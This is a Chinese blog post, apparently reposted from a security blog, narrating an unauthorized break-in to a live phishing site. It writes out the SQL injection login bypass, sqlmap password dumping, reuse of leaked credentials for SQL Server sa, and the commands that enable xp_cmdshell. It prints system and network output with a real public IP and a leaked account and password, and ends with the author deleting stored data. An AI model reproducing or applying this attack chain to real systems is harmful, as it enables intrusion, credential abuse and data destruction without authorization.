前言

偶然间发现一个钓鱼站点，随便搞搞看。

首先看一下action地址，进去转了一圈，发现不是后台，没意思。

接着就上扫描器，扫了一圈啥也没有。

最后扫下端口，有惊喜了，看这个界面，基本就是弱智后台，直接万能密码淦。

' or 1='1

' or 1='1

好的进了后台了，然后找到了真实账号密码。

903998876

li158669

好的，进了后台就完了？当然是想办法拿到shell再说，后台肯定有注入，先拿去sqlmap跑一下POST注入。

果然有，直接就出来了，问题就在于，居然时间盲注，太费时间了。

扫端口，发现开放1433，就想着sa进去，索性跑一下密码。

sqlmap -r sql.txt –passwords

在漫长的盲注等待期间，我试了一下上面拿到的密码尝试了一下。

sa/li158669

于是就进去了，服务器没开xp_cmdshell，所以我们帮他开启一下。

exec sp_configure 'show advanced options',1

reconfigure

exec sp_configure 'xp_cmdshell',1

reconfigure

好了能执行cmd命令了，首先whoami一下。

nt service\mssqlserver

再ipconfig一下

Windows IP 配置

主机名 . . . . . . . . . . . . . : ebs-48474

主 DNS 后缀 . . . . . . . . . . . :

节点类型 . . . . . . . . . . . . : 混合

IP 路由已启用 . . . . . . . . . . : 否

WINS 代理已启用 . . . . . . . . . : 否

以太网适配器 本地连接 2:

连接特定的 DNS 后缀 . . . . . . . :

描述. . . . . . . . . . . . . . . : Red Hat VirtIO Ethernet Adapter #2

物理地址. . . . . . . . . . . . . : 52-54-00-97-D6-EC

DHCP 已启用 . . . . . . . . . . . : 否

自动配置已启用. . . . . . . . . . : 是

本地链接 IPv6 地址. . . . . . . . : fe80::396f:c860:10bf:a68e%13(首选)

IPv4 地址 . . . . . . . . . . . . : 192.168.223.179(首选)

子网掩码 . . . . . . . . . . . . : 255.255.0.0

默认网关. . . . . . . . . . . . . :

DHCPv6 IAID . . . . . . . . . . . : 307385344

DHCPv6 客户端 DUID . . . . . . . : 00-01-00-01-25-4F-3B-5C-52-54-00-9C-3D-19

DNS 服务器 . . . . . . . . . . . : fec0:0:0:ffff::1%1

fec0:0:0:ffff::2%1

fec0:0:0:ffff::3%1

TCPIP 上的 NetBIOS . . . . . . . : 已启用

以太网适配器 本地连接:

连接特定的 DNS 后缀 . . . . . . . :

描述. . . . . . . . . . . . . . . : Red Hat VirtIO Ethernet Adapter

物理地址. . . . . . . . . . . . . : 52-54-00-9C-3D-19

DHCP 已启用 . . . . . . . . . . . : 否

自动配置已启用. . . . . . . . . . : 是

本地链接 IPv6 地址. . . . . . . . : fe80::c111:6e76:9e15:cc4f%11(首选)

IPv4 地址 . . . . . . . . . . . . : 211.149.223.179(首选)

子网掩码 . . . . . . . . . . . . : 255.255.255.0

默认网关. . . . . . . . . . . . . : 211.149.223.1

DHCPv6 IAID . . . . . . . . . . . : 240276480

DHCPv6 客户端 DUID . . . . . . . : 00-01-00-01-25-4F-3B-5C-52-54-00-9C-3D-19

DNS 服务器 . . . . . . . . . . . : 223.5.5.5

114.114.114.114

TCPIP 上的 NetBIOS . . . . . . . : 已启用

隧道适配器 isatap.{F62CBCB3-434F-456D-B57D-E07EF3C5621C}:

媒体状态 . . . . . . . . . . . . : 媒体已断开

连接特定的 DNS 后缀 . . . . . . . :

描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter

物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0

DHCP 已启用

再netstat -an一下

活动连接

协议 本地地址 外部地址 状态

TCP 0.0.0.0:80 0.0.0.0:0 LISTENING

TCP 0.0.0.0:135 0.0.0.0:0 LISTENING

TCP 0.0.0.0:445 0.0.0.0:0 LISTENING

TCP 0.0.0.0:987 0.0.0.0:0 LISTENING

TCP 0.0.0.0:988 0.0.0.0:0 LISTENING

TCP 0.0.0.0:1433 0.0.0.0:0 LISTENING

TCP 0.0.0.0:33890 0.0.0.0:0 LISTENING

TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING

TCP 0.0.0.0:49152 0.0.0.0:0 LISTENING

TCP 0.0.0.0:49153 0.0.0.0:0 LISTENING

TCP 0.0.0.0:49154 0.0.0.0:0 LISTENING

TCP 0.0.0.0:49155 0.0.0.0:0 LISTENING

TCP 0.0.0.0:49156 0.0.0.0:0 LISTENING

TCP 0.0.0.0:49157 0.0.0.0:0 LISTENING

TCP 0.0.0.0:49291

TCP 192.168.223.179:139 0.0.0.0:0 LISTENING

TCP 211.149.223.179:139 0.0.0.0:0 LISTENING

我对服务器并不感兴趣，就懒得上他服务器玩玩了，远程桌面应该就是端口就是33890。

既然来过了，顺带清空了后台记录的账号密码。

“轻轻地我走了，正如我轻轻地来，挥一挥手，不带走一片云彩”

转载于GKSEC博客